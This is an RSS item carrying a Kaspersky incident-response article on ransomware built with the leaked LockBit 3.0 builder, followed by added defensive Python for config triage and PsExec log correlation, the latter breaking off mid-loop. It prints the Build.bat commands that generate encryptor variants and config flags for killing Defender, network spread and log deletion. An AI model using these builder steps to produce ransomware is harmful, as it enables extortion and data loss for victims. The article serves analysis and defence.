  1764. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/04/07155410/sl-abstract-mobile-phone-malware-danger-blue-red-binary-code-1-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1765. </item>
  1766. <item>
  1767. <title>Using the LockBit builder to generate targeted ransomware</title>
  1768. <link>https://securelist.com/lockbit-3-0-based-custom-targeted-ransomware/112375/</link>
  1769. <comments>https://securelist.com/lockbit-3-0-based-custom-targeted-ransomware/112375/#respond</comments>
  1770. <dc:creator><![CDATA[Eduardo Ovalle, Francesco Figurelli, Cristian Souza, Ashley Muñoz]]></dc:creator>
  1771. <pubDate>Mon, 15 Apr 2024 10:00:28 +0000</pubDate>
  1772. <category><![CDATA[Malware descriptions]]></category>
  1773. <category><![CDATA[Data Encryption]]></category>
  1774. <category><![CDATA[Incident response]]></category>
  1775. <category><![CDATA[LockBit]]></category>
  1776. <category><![CDATA[Malware]]></category>
  1777. <category><![CDATA[Malware Technologies]]></category>
  1778. <category><![CDATA[Ransomware]]></category>
  1779. <category><![CDATA[Targeted attacks]]></category>
  1780. <category><![CDATA[Trojan]]></category>
  1781. <category><![CDATA[APT (Targeted attacks)]]></category>
  1782. <category><![CDATA[Windows malware]]></category>
  1783. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112375</guid>
  1784.  
  1785. <description><![CDATA[Kaspersky researchers revisit the leaked LockBit 3.0 builder and share insights into a real-life incident involving a custom targeted ransomware variant created with this builder.]]></description>
  1786. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/14130512/sl-lock-ecnryption-ransomware-blue-1200x646-1-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>The previous Kaspersky <a href="https://securelist.com/lockbit-ransomware-builder-analysis/110370/" target="_blank" rel="noopener">research</a> focused on a detailed analysis of the LockBit 3.0 builder leaked in 2022. Since then, attackers have been able to generate customized versions of the threat according to their needs. This opens up numerous possibilities for malicious actors to make their attacks more effective, since it is possible to configure network spread options and defense-killing functionality. It becomes even more dangerous if the attacker has valid privileged credentials in the target infrastructure.</p>
  1787. <p>In a recent incident response engagement, we faced this exact scenario: the adversary was able to get the administrator credential in plain text. They generated a custom version of the ransomware, which used the aforementioned account credential to spread across the network and perform malicious activities, such as killing Windows Defender and erasing Windows Event Logs in order to encrypt the data and cover its tracks.</p>
  1788. <p>In this article, we revisit the LockBit 3.0 builder files and delve into the adversary&#8217;s steps to maximize impact on the network. In addition, we provide a list of preventive activities that can help network administrators to avoid this kind of threat.</p>
  1789. <h2 id="revisiting-the-lockbit-3-0-builder-files">Revisiting the LockBit 3.0 builder files</h2>
  1790. <p>The LockBit 3.0 builder has significantly simplified creating customized ransomware. The image below shows the files that constitute it. As we can see, <strong>keygen.exe</strong> generates public and private keys used for encryption and decryption. After that, <strong>builder.exe</strong> generates the variant according to the options set in the <strong>config.json</strong> file.</p>
  1791. <div id="attachment_112388" style="width: 930px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103136/LockBit_case_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112388" class="size-full wp-image-112388" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103136/LockBit_case_01.png" alt="LockBit builder files" width="920" height="393" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103136/LockBit_case_01.png 920w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103136/LockBit_case_01-300x128.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103136/LockBit_case_01-768x328.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103136/LockBit_case_01-819x350.png 819w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103136/LockBit_case_01-740x316.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103136/LockBit_case_01-655x280.png 655w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103136/LockBit_case_01-800x342.png 800w" sizes="(max-width: 920px) 100vw, 920px" /></a><p id="caption-attachment-112388" class="wp-caption-text">LockBit builder files</p></div>
  1792. <p>This whole process is automated with the <strong>Build.bat</strong> script, which does the following:</p><pre class="crayon-plain-tag">IF exist Build (ERASE /F /Q Build\*.*) ELSE (mkdir Build)
  1793. keygen -path Build -pubkey pub.key -privkey priv.key
  1794. builder -type dec -privkey Build\priv.key -config config.json -ofile Build\LB3Decryptor.exe
  1795. builder -type enc -exe -pubkey Build\pub.key -config config.json -ofile Build\LB3.exe
  1796. builder -type enc -exe -pass -pubkey Build\pub.key -config config.json -ofile Build\LB3_pass.exe
  1797. builder -type enc -dll -pubkey Build\pub.key -config config.json -ofile Build\LB3_Rundll32.dll
  1798. builder -type enc -dll -pass -pubkey Build\pub.key -config config.json -ofile Build\LB3_Rundll32_pass.dll
  1799. builder -type enc -ref -pubkey Build\pub.key -config config.json -ofile Build\LB3_ReflectiveDll_DllMain.dll</pre><p>
  1800. The <strong>config.json</strong> file allows enabling impersonation features (<strong>impersonation</strong>) and defining accounts to impersonate (<strong>impers_accounts</strong>). In the example below, the administrator account was used for impersonation. The configuration also allows enabling the encryption of network shares (<strong>network_shares</strong>), killing Windows Defender (<strong>kill_defender</strong>), and spreading across the network via PsExec (<strong>psexec_netspread</strong>). After a successful infection, the malicious sample can delete Windows Event Logs (<strong>delete_eventlogs</strong>) to cover its tracks.</p>
  1801. <div id="attachment_112389" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112389" class="size-large wp-image-112389" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02-1024x508.png" alt="Custom configuration" width="1024" height="508" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02-1024x508.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02-300x149.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02-768x381.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02-706x350.png 706w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02-740x367.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02-565x280.png 565w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02-800x397.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02.png 1382w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112389" class="wp-caption-text">Custom configuration</p></div>
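<p>As an added example (not part of the original article, and not Kaspersky&#8217;s or the builder&#8217;s code), here is a Python triage helper for a config.json recovered from builder artifacts during an engagement. It reads the option names the article lists and turns them into a responder&#8217;s checklist: which capabilities were switched on, which accounts the attacker held credentials for, and which hosts and paths were deliberately spared. The sample configuration is constructed; its nesting, the <code>user:password</code> format of impers_accounts and the <code>white_*</code> exclusion key names are assumptions for illustration and may differ from the leaked builder&#8217;s schema.</p>

```python
import json

# Constructed sample, not the leaked builder's file. Option names follow the article
# (impersonation, impers_accounts, network_shares, kill_defender, psexec_netspread,
# delete_eventlogs); the nesting, the "user:password" list format and the white_*
# exclusion keys are assumptions made for this example.
SAMPLE_CONFIG = json.dumps({
    "config": {
        "settings": {
            "impersonation": True,
            "network_shares": True,
            "kill_defender": True,
            "psexec_netspread": True,
            "delete_eventlogs": True,
            "self_destruct": False,
        },
        "impers_accounts": "CORP\\Administrator:Passw0rd!,CORP\\svc_backup:S3cret",
        "white_folders": "$recycle.bin;windows;system volume information",
        "white_files": "ntuser.dat;boot.ini",
        "white_hosts": "DC01;BACKUP01",
    }
})

# What each enabled capability means for the responder.
CAPABILITY_ACTIONS = {
    "impersonation": "reset every account in impers_accounts and review its logon history",
    "network_shares": "inventory SMB shares reachable from the first infected host for encrypted files",
    "kill_defender": "verify Defender service state and tamper protection on every affected host",
    "psexec_netspread": "hunt for PSEXESVC service installations (System log event ID 7045) estate-wide",
    "delete_eventlogs": "treat local event logs as lost; rely on forwarded logs and EDR telemetry",
}


def parse_accounts(raw):
    """Split an impers_accounts string into (user, password) pairs (format assumed)."""
    accounts = []
    for item in raw.split(","):
        item = item.strip()
        if item:
            user, _, password = item.partition(":")
            accounts.append((user, password))
    return accounts


def split_list(raw):
    """Semicolon-separated exclusion list (separator assumed) to a clean Python list."""
    return [x.strip() for x in raw.split(";") if x.strip()]


def triage_config(config_json):
    """Turn a builder config into an IR checklist: enabled capabilities, the accounts whose
    plaintext credentials the attacker held, and the hosts/paths deliberately spared."""
    cfg = json.loads(config_json)["config"]
    settings = cfg.get("settings", {})
    enabled = sorted(k for k, v in settings.items() if v is True)
    accounts = parse_accounts(cfg.get("impers_accounts", "")) if settings.get("impersonation") else []
    return {
        "enabled": enabled,
        "actions": [(k, CAPABILITY_ACTIONS[k]) for k in enabled if k in CAPABILITY_ACTIONS],
        "accounts_to_rotate": [user for user, _ in accounts],  # never echo the passwords
        "spared_hosts": split_list(cfg.get("white_hosts", "")),
        "spared_folders": split_list(cfg.get("white_folders", "")),
        "spared_files": split_list(cfg.get("white_files", "")),
    }


if __name__ == "__main__":
    report = triage_config(SAMPLE_CONFIG)
    for key, action in report["actions"]:
        print(f"[{key}] {action}")
    print("rotate:", ", ".join(report["accounts_to_rotate"]))
    print("spared hosts:", ", ".join(report["spared_hosts"]))
```

<p>Hosts on the exclusion list were not encrypted, so their event logs and shares are a sensible first stop for evidence collection, and the impersonation accounts are the credentials the attacker demonstrably held in clear text, so they are reset before anything else.</p>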
1802. <p>Besides this, the builder lets the attacker choose which files, directories and hosts to exclude from encryption. If the attacker knows their way around the target infrastructure, they can generate malware tailored to the target&#8217;s network architecture: important files, administrative accounts and critical systems. The images below show the process of generating customized ransomware according to the above configuration, and the resulting files. As we can see, <strong>LB3.exe</strong> is the main file. This is the artifact that will be delivered to the victim. The builder also generates <strong>LB3Decryptor.exe</strong> for recovering the files, as well as several variants of the main file. For example, <strong>LB3_pass.exe</strong> is a password-protected version of the ransomware, while the reflective DLL can be used to bypass the standard operating system loader and load the malware directly into memory. The TXT files contain instructions on how to execute the password-protected files.</p>
  1803. <div id="attachment_112390" style="width: 640px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103600/LockBit_case_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112390" class="size-full wp-image-112390" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103600/LockBit_case_03.png" alt="Creation of a customized LockBit version" width="630" height="148" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103600/LockBit_case_03.png 630w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103600/LockBit_case_03-300x70.png 300w" sizes="(max-width: 630px) 100vw, 630px" /></a><p id="caption-attachment-112390" class="wp-caption-text">Creation of a customized LockBit version</p></div>
  1804. <div id="attachment_112391" style="width: 627px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103622/LockBit_case_04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112391" class="size-full wp-image-112391" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103622/LockBit_case_04.png" alt="Generated LockBit files" width="617" height="303" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103622/LockBit_case_04.png 617w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103622/LockBit_case_04-300x147.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103622/LockBit_case_04-570x280.png 570w" sizes="(max-width: 617px) 100vw, 617px" /></a><p id="caption-attachment-112391" class="wp-caption-text">Generated LockBit files</p></div>
1805. <p>When we executed this custom build on a virtual machine, it performed its malicious activities and generated custom ransom note files. In real-life scenarios, the note will include details on how the victim should contact the attackers to obtain a decryptor. It is worth noting that negotiating with the attackers and paying the ransom should not be an option. Besides the ethical issues involved, there is no guarantee that a tool for recovering the files will ever be provided.</p>
  1806. <div id="attachment_112392" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112392" class="size-large wp-image-112392" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05-1024x695.png" alt="Custom ransom note" width="1024" height="695" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05-1024x695.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05-300x204.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05-768x521.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05-516x350.png 516w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05-740x502.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05-413x280.png 413w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05-800x543.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05.png 1135w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112392" class="wp-caption-text">Custom ransom note</p></div>
  1807. <p>However, as we generated the ransomware sample and a corresponding decryptor ourselves in a controlled lab environment, we were able to test if the latter actually worked. We tried to decrypt our encrypted files and found out that if the decryptor for the sample was available, it was indeed able to recover the files, as shown in the image below.</p>
  1808. <div id="attachment_112393" style="width: 640px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103722/LockBit_case_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112393" class="size-full wp-image-112393" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103722/LockBit_case_06.png" alt="LB3Decryptor execution" width="630" height="229" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103722/LockBit_case_06.png 630w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103722/LockBit_case_06-300x109.png 300w" sizes="(max-width: 630px) 100vw, 630px" /></a><p id="caption-attachment-112393" class="wp-caption-text">LB3Decryptor execution</p></div>
  1809. <p>That said, we must once again underscore that even a correctly working decryptor is no guarantee that the attackers will play fair.</p>
  1810. <h2 id="the-recent-lockbit-takedown-and-custom-lockbit-builds">The recent LockBit takedown and custom LockBit builds</h2>
  1811. <p>In February 2024, the international law enforcement task force <a href="https://www.weforum.org/agenda/2024/02/lockbit-ransomware-operation-cronos-cybercrime/" target="_blank" rel="noopener">Operation Cronos</a> gained visibility into LockBit&#8217;s operations after taking the group down. The collaborative action involved law enforcement agencies from 10 countries, which seized the infrastructure and took control of the LockBit administration environment. However, a few days after the operation, the ransomware group <a href="https://www.scmagazine.com/news/lockbit-returns-after-takedown-with-new-extortion-threats" target="_blank" rel="noopener">announced</a> that they were back in action.</p>
1812. <p>The takedown operation allowed LEAs to seize the group&#8217;s infrastructure, obtain private decryption keys and prepare a <a href="https://www.nomoreransom.org/es/decryption-tools.html#Lockbit30" target="_blank" rel="noopener">decryption toolset</a> based on a known-victim ID list obtained by the authorities. The <strong>check_decryption_id</strong> utility checks whether the victim&#8217;s ransom ID is on the list of IDs for which decryption keys are known:</p>
  1813. <div id="attachment_112394" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103815/LockBit_case_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112394" class="size-large wp-image-112394" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103815/LockBit_case_07-1024x179.png" alt="check_decryption_id.exe execution" width="1024" height="179" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103815/LockBit_case_07-1024x179.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103815/LockBit_case_07-300x52.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103815/LockBit_case_07-768x134.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103815/LockBit_case_07-740x129.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103815/LockBit_case_07-800x140.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103815/LockBit_case_07.png 1468w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112394" class="wp-caption-text">check_decryption_id.exe execution</p></div>
1814. <p>The <strong>check_decrypt</strong> tool assesses decryptability: while there is a possibility that the files will be recovered, the outcome depends on multiple conditions, and this tool only checks which of these conditions are met on the systems being analyzed. A CSV file is created, listing files that can be decrypted and providing an email address to reach out to for further instructions on restoring the files:</p>
  1815. <div id="attachment_112395" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112395" class="size-large wp-image-112395" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08-1024x411.png" alt="check_decrypt.exe execution" width="1024" height="411" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08-1024x411.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08-300x120.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08-768x308.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08-872x350.png 872w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08-740x297.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08-697x280.png 697w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08-800x321.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08.png 1153w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112395" class="wp-caption-text">check_decrypt.exe execution</p></div>
1816. <p>This toolset caught our attention because we had investigated several cases relating to the LockBit threat. We normally recommend that our customers save their encrypted critical files and wait for an opportunity to decrypt them with the help of threat researchers or artifacts seized by the authorities, which is merely a matter of time. We ran victim IDs and encrypted files analyzed by our team through the decryption tool, but most of them showed the same result:</p>
  1817. <div id="attachment_112396" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104116/LockBit_case_09.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112396" class="size-large wp-image-112396" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104116/LockBit_case_09-1024x162.png" alt="Testing the tool on a victim ID obtained by our team" width="1024" height="162" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104116/LockBit_case_09-1024x162.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104116/LockBit_case_09-300x47.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104116/LockBit_case_09-768x121.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104116/LockBit_case_09-740x117.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104116/LockBit_case_09-800x126.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104116/LockBit_case_09.png 1456w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112396" class="wp-caption-text">Testing the tool on a victim ID obtained by our team</p></div>
1818. <p>The <strong>check_decrypt</strong> tool also confirmed that it was not possible to decrypt the files by using the database of known keys:</p>
  1819. <div id="attachment_112397" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112397" class="size-large wp-image-112397" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10-1024x499.png" alt="Testing the check_decrypt.exe tool on encrypted files" width="1024" height="499" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10-1024x499.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10-300x146.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10-768x375.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10-718x350.png 718w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10-740x361.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10-574x280.png 574w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10-800x390.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10.png 1466w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112397" class="wp-caption-text">Testing the check_decrypt.exe tool on encrypted files</p></div>
  1820. <p>Our analysis and previous research confirmed that files encrypted with a payload generated with the help of the leaked LockBit builder could not be decrypted with existing decryption tools, essentially because the independent groups behind these attacks did not share their private keys with the RaaS operator.</p>
  1821. <h2 id="geography-of-the-leaked-lockbit-builder-based-attacks">Geography of the leaked LockBit builder-based attacks</h2>
1822. <p>Custom LockBit builds created with the leaked builder were involved in a number of incidents all over the world. These attacks were most likely unrelated and executed by independent actors. The leaked builder has apparently been used by LockBit ransomware competitors to target companies in the Commonwealth of Independent States, violating the group&#8217;s number one rule to avoid compromising CIS nationals. This <a href="https://flare.io/learn/resources/dark-web-drama-lockbit-and-the-an-security-breach-saga/" target="_blank" rel="noopener">triggered a discussion</a> on the dark web, where LockBit operators tried to explain that they had nothing to do with these attacks.</p>
  1823. <p>In our incident response practice, we have come across ransomware samples created with the help of the leaked builder in incidents in Russia, Italy, Guinea-Bissau, and Chile. Although the builder provides a number of customization options, as we have shown above, most of the attacks used the default or slightly modified configuration. However, one incident stood out.</p>
  1824. <h2 id="a-real-life-incident-response-case-involving-a-custom-lockbit-build">A real-life incident response case involving a custom LockBit build</h2>
  1825. <p>In a recent incident response engagement, we faced a ransomware scenario involving a LockBit sample built with the leaked builder and featuring impersonation and network spread capabilities we had not seen before. The attacker was able to exploit an internet-facing server that exposed multiple sensitive ports. Somehow, they were able to obtain the administrator password – we believe that it may have been stored in plain text inside a file, or that the attacker may have used social engineering. Then, the adversary generated custom ransomware using the privileged account they had access to. Our team was able to obtain the relevant fields present in the <strong>config.json</strong> file that the attacker used:</p><pre class="crayon-plain-tag">"impersonation": true,
  1826. "impers_accounts": "Administrator:************",
  1827. "local_disks": true,
  1828. "network_shares": true,
  1829. "running_one": false,
  1830. "kill_defender": true,
  1831. "psexec_netspread": true,
  1832. "delete_eventlogs": true,</pre><p>
  1833. As we can see, the custom version has the ability to impersonate the administrator account, affect network shares, and spread easily across the network via PsExec.</p>
1834. <p>Moreover, it is configured to run more than once on each host. One of the first things the executable does on startup is check for, and create, a unique mutex based on a hash sum of the ransomware public key, in the format <strong>&#8220;Global\%.8x%.8x%.8x%.8x%.8x&#8221;</strong>. If the <strong>running_one</strong> flag is set to true in the configuration and the mutex is already present in the operating system, the process exits.</p>
  1835. <p>In our case, the configuration allowed concurrent executions of several ransomware instances on the same host. This behavior, combined with the use of configuration flags for automatic network propagation with high-privileged domain credentials, led to an uncontrolled avalanche effect: each host that got infected then started trying to infect other hosts on the network, including those already infected. From an incident response point of view, this means finding evidence, if available, of different origins for the same threat. See below the evidence found on one host of remote service creation by PsExec with authentication completed from multiple infected hosts.</p>
  1836. <div id="attachment_112398" style="width: 744px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104355/LockBit_case_11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112398" class="size-full wp-image-112398" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104355/LockBit_case_11.png" alt="Remote service creation by PsExec" width="734" height="766" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104355/LockBit_case_11.png 734w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104355/LockBit_case_11-287x300.png 287w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104355/LockBit_case_11-335x350.png 335w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104355/LockBit_case_11-268x280.png 268w" sizes="(max-width: 734px) 100vw, 734px" /></a><p id="caption-attachment-112398" class="wp-caption-text">Remote service creation by PsExec</p></div>
  1837. <p>Although this evidence was present in the infected systems, most of the logs had been deleted by the ransomware immediately after the initial infection. Because of that, it was not possible to determine how the attacker was able to gain access to the server and to the administrator password. The remote service creation logs remained because when the malware was performing lateral movement on the network, it generated new logs, which it did not delete, and which were helpful in detecting its spread across the infrastructure.</p>
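<p>The re-infection pattern described above leaves a recognizable trace: on one host, several PsExec service installations, each preceded by a network logon from a different already-infected machine, followed by the audit log being cleared. The following is an added example (not code from the original post) that correlates Windows event records in exactly that way. The event IDs are real (7045: new service installed, 4624: successful logon, 1102: audit log cleared); the hosts, accounts, addresses and timestamps in the sample are constructed, and the two-minute correlation window is an assumption.</p>

```python
"""Correlate Windows event records to surface the PsExec re-infection pattern.
Example code, not from the original post; the records below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (made-up hosts, accounts and addresses).
# SRV-FILE01 shows the avalanche pattern: PSEXESVC installed three times,
# pushed from three different sources, then the audit log is cleared.
# WS-HR07 shows ordinary single-source admin use of PsExec for contrast.
SAMPLE_EVENTS = [
    {"ts": "2024-03-10T02:11:04", "host": "SRV-FILE01", "id": 4624, "logon_type": 3,
     "account": "CORP\\Administrator", "src_ip": "10.0.5.21"},
    {"ts": "2024-03-10T02:11:06", "host": "SRV-FILE01", "id": 7045,
     "service": "PSEXESVC", "image": "%SystemRoot%\\PSEXESVC.exe"},
    {"ts": "2024-03-10T02:13:40", "host": "SRV-FILE01", "id": 4624, "logon_type": 3,
     "account": "CORP\\Administrator", "src_ip": "10.0.5.37"},
    {"ts": "2024-03-10T02:13:41", "host": "SRV-FILE01", "id": 7045,
     "service": "PSEXESVC", "image": "%SystemRoot%\\PSEXESVC.exe"},
    {"ts": "2024-03-10T02:14:02", "host": "SRV-FILE01", "id": 4624, "logon_type": 3,
     "account": "CORP\\Administrator", "src_ip": "10.0.5.88"},
    {"ts": "2024-03-10T02:14:03", "host": "SRV-FILE01", "id": 7045,
     "service": "PSEXESVC", "image": "%SystemRoot%\\PSEXESVC.exe"},
    {"ts": "2024-03-10T02:14:30", "host": "SRV-FILE01", "id": 1102,
     "account": "CORP\\Administrator"},
    {"ts": "2024-03-10T09:00:00", "host": "WS-HR07", "id": 4624, "logon_type": 3,
     "account": "CORP\\helpdesk", "src_ip": "10.0.9.2"},
    {"ts": "2024-03-10T09:00:01", "host": "WS-HR07", "id": 7045,
     "service": "PSEXESVC", "image": "%SystemRoot%\\PSEXESVC.exe"},
]


def _parse(ts: str) -> datetime:
    return datetime.fromisoformat(ts)


def _is_psexec_install(ev: dict) -> bool:
    # PsExec installs a service named PSEXESVC on the target; the name can be
    # changed by the operator, so the binary path is matched as well.
    return ev["id"] == 7045 and (
        ev.get("service", "").upper() == "PSEXESVC"
        or "PSEXESVC" in ev.get("image", "").upper()
    )


def correlate(events, window_seconds: int = 120, min_sources: int = 2) -> dict:
    """Per host: who pushed PsExec, from how many sources, and was the log cleared."""
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev["host"]].append(ev)

    findings = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: _parse(e["ts"]))
        # Logon type 3 = network logon, which is how PsExec authenticates.
        logons = [e for e in evs if e["id"] == 4624 and e.get("logon_type") == 3]
        sources, accounts, installs = set(), set(), 0
        for ev in evs:
            if not _is_psexec_install(ev):
                continue
            installs += 1
            t = _parse(ev["ts"])
            lo = t - timedelta(seconds=window_seconds)
            # Network logons shortly before the service install identify the
            # machine that authenticated to push it.
            for lg in logons:
                if lo <= _parse(lg["ts"]) <= t:
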